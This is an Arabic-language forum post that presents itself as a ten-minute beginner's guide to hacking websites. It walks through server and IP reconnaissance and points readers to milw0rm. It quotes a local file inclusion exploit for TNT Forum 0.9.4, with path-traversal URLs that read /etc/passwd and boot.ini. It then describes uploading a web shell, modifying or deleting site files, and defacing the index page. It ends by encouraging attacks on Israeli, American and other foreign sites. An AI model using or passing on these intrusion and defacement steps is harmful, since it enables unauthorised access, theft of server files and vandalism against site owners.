Berradja Mohamed Toufik
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته

عزيزي الزائر / عزيزتي الزائرة
يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك في منتدى براجع محمد توفيق

شكرا


ادارة المنتدى

تعال يامبتدا 10 دقايق وتكون هكر مواقع :)

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

تعال يامبتدا 10 دقايق وتكون هكر مواقع :)

مُساهمة من طرف Admin في 13/8/2011, 21:26


+
----
-

بسم الله الرحمن الرحيم

السلام عليكم جميعآ





بـسم آلله _- نبدأ-_
آول شي لآزم نعرف آلموقع على آي سيرفر

والسيرفر معنآه ( خآدم )
ونطلع آلآي بي (ip) آلموووقع
رآح تقولي يااستكنان كيف آطلع كل هذا ؟؟

آقولك روح لي (( آبدأ (start) ــــ> وبعدين لي تشغيل (ren) ـــ> بعدين آكتب cmd
رآح تطلع لك شآشه سودآ
بعين آكتب ping
وبعدين رآبط آلموقع بدون (vb) ولآ(http)

يعني كذا ping www.xxxx.com

ولاتنسى آلمسآفه بين ping ورآبط آلموقع

_-_-_-_-_-_-_-_-_-_-_-_-_-_-
وبعدين تطلع لك آرقآم كثيره كلهآ نفس الشي
خذ آول آلآرقآم وحفظه

وبعدين روح لي
www.live.com
آو
www.msn.com

وكتب كذا :
ip:XXXXXXXXX
علمآ آن XXXXX آي بي آلموقع ( ip)
آلحين طلعنآ آلسيرفر وخلصنآ رآح تقولي
شلون آبي آخترق آلحين ؟؟؟؟؟؟؟؟؟؟؟؟

آقولك يآطويل العمر
روح للموقع هذا :
http://www.milw0rm.com/×××apps.php

ودور آخر آلثغرآآت

ورآح تقولي آنآ لقيت ثغره وشلون آخترق آلموقع آلحين .؟.؟
آقولك آدخل على آول وحد يعني آول موضوع
رآح تطلع لك شآشه بيضآء مكتوب عليهآ نفس كذآ :

================================================== ====
TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
================================================== ====

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'


AUTHOR : CWH Underground
DATE : 10 June 2008
SITE : www.citec.us


################################################## ###
APPLICATION : TNT Forum
VERSION : 0.9.4
DOWNLOAD : download.tntforum.tuttoeniente.net
################################################## ###

---LFI---

################################################## ###############
Vulnerable in index.php:

137: //Variabili generali
138: $modulo = @$____['modulo'];
139: $modfile = 'mod_'.$modulo.'.php';
################################################## ###############

Exploit:

[+] For Windows
http://[Tar___]/[tntforum_path]/index.php?modulo=../../../../../../../../boot.ini%00

[+] For Linux
http://localhost/tntforum/index.php?.../etc/passwd%00


################################################## ################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
################################################## ################

# milw0rm.com [2008-06-10]

آدري آنك مآفهمت شي
آلحين روح دور على كلمة :
Example

آذآ لقيتهآ رآح تلقآ جنبهآ آو تحتها آستغلال آلثغره ( آلآستغلال هو آهم شي ومآيحتآج شرح )

وهذآ هو آلآستغلال :
http://localhost/tntforum/index.php?.../etc/passwd%00


هذآ تحطه بعد رآبط آلموقع على طول يعني يصير كذآ :
http://xxxx.com/tntforum/index.php?m.../etc/passwd%00



علمآ آن آخر كلمة بعد علآمه = هذي=../../../../../../../../الشل

ولآ تنسى تكتب آخر شي "؟" علامة ؟ هي آهم شي هالعلامه (؟)
نفضر آننآ طلعنآ آلسيرفر وطلعنآ آلآي بي ip وطلعنآ آلثغره وآلآستغلآل
نفتضر آن آلرآبط طلع خطأ!!!!
معنآتهآ آن آلثغره مرقعه يعني مآيصير
تروح لي للموضوع آلثآني وآنت تدوور على آلآستغلال

آلحين آنت تقولي من وين آجيب آلشل ؟.
آقول روح دور بمواضيع المنتدا تلقا
_-__-_-_-_-_-_--_--_------
آنت آلحين تقولي آنآ رفعت آلشل آلحين
وش آسوي ؟؟؟؟؟؟؟؟؟؟ووش آلفآيده آلحين .؟؟؟؟؟

وش آلفآيده ؟ آنك آلحين تشوف كل ملفآت آلموقع بس وتحذف وتعدل بس بشرط !!!!!

آذآ كآنت حآلتك root على آلسيرفر فأنت آلملك آلحين !
وذآ كآنت حآلتك user فآنت وزير الملك
وآذآ كآنت حآلتك nbode
فآنت زآئر مآتقدر تعدل ولآ تحذف آلآعلى آلموقع آلي عليها تصريح (777)
تقدر تسوي آلي تبي !
وتقولي شلون آدري آن فيه موآقع عليها تصريح (777)

آقولك رآح يكون لونهآ آخضر !

ولحين رآح تقولي وش آسوي آبي آخترق آلموقع !





رآح آقولك آدخل على آلموقع آلي تبيه

وبعدين روح لي UP وبعدين آستعرآض وبعدين آندكس آلآخترآآآآآق

________________________________

ومبروووووووووووووووووك آخترقت آلموقع

هذا الي عندي <<~~~اذا عجبكم الموضوع لا تبخلو بالتقييم

ارجو ان التجريب يكون ع مواقع اسرائليه ولا امريكيه ولا اجنبيه اهم شي اني ابري نفسي
مع السلامهـ

___________________
Strive to be the best Be with us
avatar
Admin
Admin
Admin

عدد المساهمات : 844
تاريخ التسجيل : 01/09/2010
العمر : 24

http://berradja-m-toufik.online-talk.net

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى